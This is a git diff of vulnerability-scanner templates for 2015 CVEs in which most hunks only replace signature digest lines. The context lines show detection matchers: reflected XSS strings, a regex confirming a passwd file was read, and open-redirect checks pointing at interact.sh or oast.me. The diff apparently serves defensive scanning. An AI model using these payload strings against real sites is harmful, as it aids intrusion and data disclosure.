44106be76c..d43fe9df8a 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220665745bd3a457267ee326a117ea8ea4d2387e13d8a0a35c772fbb4e9a559fdbd02210094e7482d37c4ee19e1acac9b0ffc49697c91c87899ed70380dcb4f94f2de9a4e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039c7f6a685d7be17f38e03aa9ff5c7f49604a72c3033696089ab79cd6549212a022100a35ffc88ed4a8391774397e52ea44a46f18b56420d2a535349e9db2abd9770da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index ceeafe27ee..5d99288e2f 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c40bdb7bd460a0d6bd334d92781fc800906ab0c715f265d183fdb396a9b05eb502205f3f70b07ad80a29007ec4c48a58b0361ee3af672f97e1d7b14440eeff41603d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100db49ffcdb87fbefdba424969e766a085661d562d0c0bfd761e4e3635b5a1fbd7022100f72708d60d16adb2a965d6e978ad6eed5c166310ff4d9c7d56e6977e70323138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index f7ca41576e..de1410b8ca 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100930ffdae3255b060101f8a9ccf74d6a120c18d66d2e4006da4b5f3d0bc55c850022008877aed41de6f4b5e6a68618ec6eaf2057e9bdda410a183738d3d2d2fde44db:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dd64970f369270bcd66830906869421edc8be28f499bf3f9062a1adc385ee94902202928f34bf94b998aad0d3bede5a414a5e4b16a89f8946393b58785e522dbd095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 647386d033..4da93fce0a 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204c37e3554d885ccfc0e5203bd97b40f1aaf0eaead6569af099dde0039ed92be302207b94b37466b7cc0a6f5c03581e1efee65bbc0c03f6548f3fdc103e2846faabd0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220529e66e005ac896b9746c2903be61c6e7c52e0246b465e4052d5767215fefc48022100fe7984e4cd83461627e6b01032859d28ad644c6f9bc1ba3df8a04b8816c3cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 67ff17355c..0975b6eb41 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dadcb82d978e0785e8439fceca25f8a2f6f30a186b217c349c75aaad5b418dad02205a89d80823d3cefd22b3048972a618a2c4ca2d5c409aff6f7bb0ca0d8a9937a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ac51a82fbfafeefc721e4752f8f2c7c1a937a1783ff10483a82c8cfb0dbf5fcf022100a5655bd648b0c2243aef56caaa2488eac323a1537d6a679174d262945996e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 801df8b598..96ec50ff0e 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a830bce6321431f8e446a0524e4d923f3355acf70a3d0ce47a5a2317b1448d6f0221009fecdca42d3e614d288a42764eec122b14c1185b17a2c7d71b5f4da8b5eb8d94:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220402e33a5aa8058672223b395aef9a430dbc5b72a8520440a5848306f11648a9d0220779404cb56081d8fdff94100637d2871319c680e95836c5bdd38c786ddc3a58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 560f62d558..3dfae3247f 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220791925fc8c7712fabdc7d68788c376289276a93d2af17b20a6f2db6592c2d54b022100ad5c533f45025f87c6b7040180fa5119735a35a292b6361d61c800f5b8c6fcd7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009e46fab9a00671019e99b28f9e086482caf3a5fd359bbaeba5313a28958a1009022100a708bde3a8cfcac9c7f2afefbeca2038d8e3aee3bc6afda55270e20bd0342e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 079aafd4bf..58c7145e47 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204303407133e7a825a880c9b270a979fcbb68424315d5ea4a4bdfb0719de3bae5022033a045b0423d76d3810ca05c0c36cb9e6cdaec4c6f1bdb21ca4fc08778b6e34f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220704a49da41784471902efc1daed17a27ca529b0a380f1613243c7e5d56204ccc022100e78f54f51d90d305456716ea5886c7d3137756ef4dde1f547b158e1c0fc224d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 04948f0d60..b059e6176e 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 400 - -# digest: 490a0046304402203ba72571d26a7a8c2e2941554b5b7f3da2836fa325345437b8c35891341964da02200c8d1c7bebed5dd70db6712deb83bfa5156e436cb995d862326c1a1850978ca6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210091d71659c77437196bfaa8fda5ece48aae5e4e735b91138cf381aa7746bbcb9102204d7f5c1af4309fbf143e96b4e354683c183ac067016d08f0e9fe6fc0f0c38950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 851f36c06c..96b91857f4 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a833ee14ba25d79fa43a582b591e4eeff63b556e86f980b978a7cbf5420b0fe702206a12a8f8fc3f8f6686b16ed5bcd6068600e5a2c6412275251ac59bb3876096cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b2d0c247e6ba7fe76b7f244b2fb0c424a7443df0879d2b9f5b100f4dc636e1e702205757d520ec8a536c82bb40d21026c1311123457ab469b3c189ef5e379e822950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index eef910125a..19fb2e2911 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -42,5 +42,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and - -# digest: 490a00463044022030dd9880d366c08cf994d2404a4dc96a9384c8a0f82f11e45e64f0feecf73edd02200723290cbf59cad635380f404d2e87a42b24d489ae4d1f4bb7b9cc74087adc1e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204370b3d2856b8275559185518e728f708e68c27fa6d4f020b54926268328596b02205e03fb443a376e20dda43c5877a5cb445f98484c267df3dd28b060d3dbe0272a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 18775d4923..f8c09218fc 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -55,5 +55,4 @@ http: - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")' - 'contains(body_2, "ab-google-map-travel")' condition: and - -# digest: 4a0a00473045022100d2d0521be57a5a0ed8f74987d26f114ec87517218dfdc9a5e49b3b4228072bae02207b9cfebb551858c9f8ff077226f3e927babd01df2e5d7bb0b30e8519827a368b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022052e413f12e15c2c97ad53e4d5b83e8c8b6cca6f3a130268627e195d48f87e41102210095e370dc01497ba4a28993ac34e43f2a09a795937c85bdd3b5ef2f8dde1a1265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index ce3f25fcf3..f5a7f961ea 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d61f42552190b4f24d64f5c7548f9308e9e3fb0b699a264340701e38880c5b7022100ab81e7e017bbadf4edfa16f1c2581cd4cffc21e46a63af902fe2e6e6f0cf6c3b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207f8c737e3b484a543c4e75117a79280d460529697acea75c4a679e8932969a1802207b6c6a3520b5ccd1b07f2a6ceb489eec279f30b0c043d09901f41935863ae09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index d6f8bee017..9eff6d4901 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# digest: 4b0a00483046022100bf8ade0ef4e9191c614a80b2dde1dc30c19e53e091fb11596d226767e8a86698022100fb297fa6130952b8f5f2aac214327557e5ca2bcffa73ef853311a5c9298bbf18:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220753b0ec3aac2facd0c208439ce1796471b399df69a3a940e61da4153b061024c022100ebceed6888e75e326ea613e457406f391c9239e327781c86f950252bc27e5e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 2ad563e3f6..50c1b1263b 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022039866141efebf8976386f75cf34c13e5ff3ebc642e7b1c39cf494f2cf5ef7f16022021dedc6a292450f532c554cf4411ed2a436e219dd2f0add43d0ef92bb748b12c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100daca7ba49520acaa3916baf2088091125280782c2deb61680865e7342387e6470220356cd002c161ca1d7ae0a9890bbcc33bb7678c691893bc518f11a78558015f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 39c2002c71..fb4bbb8129 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220467712fd7c6ea16ee504ec5ed236c8ab3a6e517a06cc8dd8ee59dcb47ce1e12c0220629197fbb6f40e336f087505f58e637f0ba36715a17e31c7665869193f079433:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205615efdf2ff4d7d5454512402d1749db7886bd1ee838209c7d96923ca4c7466102202c6e1963b7eae9c5f3da8c46c7d2ac04cfd3d38c09748246ffe9ea5c5e2dde69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index ff4a4c4a6d..366525883c 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -52,5 +52,4 @@ http: - data-session-id= case-insensitive: true condition: or - -# digest: 4b0a0048304602210083bbea902fc07bfa81ad5324ab387a488638a6fbd7e4d3cc11666ea6c23d2bdb022100b73762228aeec05ff9745853c486fdaba08d9a15853793267806c30653010f59:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022059aeffb9c6ef380a91e74139f62fcaabe00fcc1ac6812ac2e194ad7b69b28b920221009d03ce232b21e340a55b07d44889ed5987ac293bf658f700efd21c939d02a7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index e9f842d735..6daccecacc 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022071c0010286b6a2ede74cebe801f385d0e4399177fe2f76244e6df2b038e9ee70022100fedfe03758b492ba482953b1053591c05ab1211117049634be5e65433245d3ed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022021c21455d9a15f140d39b79773d466acc38c6342032f6ab09c3b086acc36a90d022100981a60977858f5903f293ed3b9aa9b46fe8afa19e302b89c75b56b0aa3477c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 35e3268216..16973daa0b 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203d9bae4f2b20b8f050c4bcf15075b78ae27158da1b3fe19502ada34e001bc81b022100c4d98a7e9a76c03f342baa8b8c0eb432d27578c785d4cb6af176f38ad97a742c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e97da28129ac64b5f78ec534b2536c9a1b4db2a2961bef009b261983cdbe1a000220735a847b7cd1d452a5589820f14c23455b4f25742e0df9e84a546c0d173caeab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 0163aac5ec..73b1ece9b6 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -47,5 +47,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" - -# digest: 4b0a00483046022100824f770920f8b1114a216eea728ecb5a65f29b8ddf5ada013e2a79c81a66b70e022100ac1a4d4440cc912433ead0d924652553b5ae522ec10a50fe3bf75dad25a0edba:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202c537db4deeabb2858cebec29a66c719e23e2cc91e28f4376eccb7deb7b52567022100e400a8329eece4fae0ba25a3cd419ac070fb46f8df6742d4981f682a2746b5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 2345019794..fbafebcd39 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009000aa7ff08251fa3b308c067ea456ccafd6b9868fc603abb4e0f8fe643567f2022100e9144c3a1d77468b60ec62b8f286424d39b1dd07b2ab97cde11d498c310569aa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200fdaa60e58a3bb03e481caf486d722078fa3a874b42f6085b34e0ed0cc23de26022100b490d21a025194917a6a1c3b3aa9e269f9c8ff2eab6dacd54b9f52a2a774090e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 3ed07858e4..5c9c4ba718 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -50,5 +50,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and - -# digest: 4a0a00473045022100f1a6717bc28d0cfd66a57cc2609b423e5fb3147c285b3205dc8b6d6bfc0aeeb202201ac7e00a3dfc4af69a9125cccc2abb51e5c043bbfd1b4585296e2bea7fcd37e6:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220135258595ae8f09800c454e6d6cbf3fe9e7c76090a52b1599f90838baa333e830220694d4d36b66cf444e21bc630234aae594007922facc17c15c929440165216492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 13d9a97666..1fba17c5d8 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -48,5 +48,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')" condition: and - -# digest: 4a0a0047304502210084e37489cc04e937592771b74837e4ad3bbea1d8f4bc8a75edec0e7c567d602902201da0f340bbf0606282e6c6c67558155e4c07166c5ea54b520232e921609625ca:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100df1edb2338068ee5872fede0d23d43b9dc9881db461985e2f80cb063d3442e64022100ee2ab5898665d09e408545ca0dd2a7631a9a7dbf587153443deff7dbdc96d62c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 08cae970a7..1965038b50 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a856ad911d520061373088bff36fac1f62e8a46acaef8e2d8dd15c4f287a895b022017072ee25a79643aa7b14b74768c0675664e550a45ff1f5dd85fd3829f3a4b40:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201ae38371fd9d75858c8f7b644db0602845b74226347f0fd28e936305913a60f602203cc3b4b81af502e1217906283fd2d1c1155928be30ad1c977e27762304fb187d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index bdc53bf160..037edb4fd0 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022051b3364d2efcde017ffdac9c1cd00afb91b8de3de14d079ef322e8e22c5070d4022100d2186c6fd37751d8a694403557743b96d4e05d0b105f691f6f1a38c262c4ed7d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210084c2d42efe718b56c27c4c1b96dd56af3f11b1193ec21f4b230998a538a54453022100ac8b38e2a722624d470d125c03cf71d81aa6591d737097d17d0de44b596af613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 02e98f7582..4f2c1465e9 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022011fbae01407e55149e3fcde072f071ab30c83cfeaf8f630555722706158fe36d022100aab6229372c96d716f30823e78793b504afd852b818c603b716e6c63a8c339a9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dc8761203ed1183935c459ab355e1c4ea1167aae3ae05fa7338f17ac1c96ed4402202b31e0e7beae18e30ebf0e7acfce097daceb61de5b2065078d558b75fe021b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 24d43e2a0b..a93f373746 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022013009c42ad0e752ddf8d91ba03f9edfa1347d2496a55821475729fcc5264344402210098b0e987f577eb37727cc31432c989a3a5903c4eb095fdab85e92f40c53b2928:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202a36311e71e3cdec46b20d9b6049f14b0c0300ff143964557a6348289c1a1062022022b42092c01b37c6b52159bc951c9598fa0de334cec5042683bc91487a8f0706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 9fe738b991..4b68fd8985 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022066a53d57a571ddeba5150ff3e2b82bc3b62bab47d4f22c1f38c11f188d85317c022100a524b7481cc7327bcb16d0faf7e107ea6397b09acb9c7fb603d9bf8653b161cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009b794b66b8a1b677a5f80808daa31288e68fed148c85baa8526f870fc60dbc3402204121e94d57d57bac36d99c2f14094d462da506cb47933f84a6af918c59a66025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index b73ab1ebca..8079cd4604 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a0047304502206082c8204a59fba926aa03ae20df352c1b22d7bccd458841dacdacc3dde66780022100c87412f0be758fa83b71c4363803cded88102d6bf2bb483f8e5a70a3239ebc58:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022006178711f74486976dec4d0cb2b3a1326cca7c6cf0f58ebccfec1e44566e2da20221008a18227330603f6a408b01c01940f54057f8c01b80410c06834bb0f2e5825e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index e68d31fdfc..2169350a18 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210095419c4e67c2dc5dd8b8f060624b23fe393dd5c03c502232651dc6125a2af4e7022100e43169e800bbfb456ab0b5f5956df2a70bacf58071e62210d6a7baf20e7803b0:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022060e6a326c725c6f60d2f3aced8a04e334356aadb8ec890ea11b04318bb83d6c602204ab556432549ce91848522bdf915c9ccb0041f8b7b8c56b19e236743317d2c15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index a0bede8356..d0d3810772 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022100df7fd2004c0fc1b55c756634f88548a3e98cd015bba07b8ea33f0f1aa67b2eff022068a7b2a7e6e5808ccbde24a7a610e3e0bddacc753da0df62cf4cc60b7bb2500c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220111588b78c7cb5bf17acf07467a6846ad72f4c02511f12dbc839c1d1ed5bc4f5022100b48d34fe9b4763c3d3d6b98238390bb5f0cda9660593f8b45219f2c8172da0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 0dbbb91c94..c13528cc67 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100e9cbf6abd34dbc2eac28530370a6d7d53ab7e054322fbc07d5048c86c8762b2502205f836f98213031ef14fb166fe8f20e1404464f3b4248b77d6d42fa8f5ad0e5cf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8fcc848d7c767765c054a0a63d8dd36b25df928f090e279c73d92210f3016b9022100a419c1230070bca6b2673e7fe2672c63f99ebcebd9eed530bb7004eb903099fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 36f5210161..f8ffcb1060 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206cfd7d7337fd1af820b4e914de09db80b48e2944dfcb519ef0f2f0fed915ad48022070bad2882c743a39c6312373741a7908bbaecc830b3afcdcaa0aabf7cde91e63:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220288f63e5c2305a7cfcd4b1fc817443df5108376e0813b4fac34286bd2ed8fb0b022100d87ad9e4b6df35a223ad59ccff9c665caefbe3ebc4ef87068de17b7c0f2f2f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 24e735a97a..99b53797ab 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204d2eb1e932424d41a7997fb0e13e90939956d2fbb62649b2598e44a93ca4ad3f022100cb07716ad2e1483b9818fa49a02cdfef83a1f353979c92bd0fbe05ca253ffc0c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204baa872bd202542bbdd5fae020d8fe852090c3299130349a2c89b6e84e79ee39022100d4e6936f064b5cd69df7b458220664739953bc7fa234076a5b351348cc051325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 9c836b927e..37ab996ef5 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100ef6608aaac394b2844a9a4df6bd2eb09146a5535b080472f6ec0413a98899861022100d872fa46cb8b4806ba652b2b5f00cb0ff13b785398979c8e195b6e499b323c87:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009f0a58539cb8d68d3e00f1d142b7f88ac00dfab117e0e6aef7adde5151f68067022100ff0a304ba6e6b437254acad6c3c78f97073b8362a59650abf0fdfa7d59e75469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index b03cb87caf..3a6b2e05bd 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008911d45181394a912aad205c1330ab932c8c89e40d0cd6b8788fe00835e62da5022100c4f93ef694cdefe279c4eb0e11e68226bd0f4b0aeab908909ea56922871ceb1b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d10c25fbe8f9997a50a37b08f8867f2c64256e111f5a8f342b1c2d371a81f72f0220044bc77c25306fb673529968023356bbe09f151a5004dfb68ac4d776b823026f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 80c69296c4..171da5a555 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -45,5 +45,4 @@ http: part: body words: - "</script><script>alert('{{randstr}}')</script>" - -# digest: 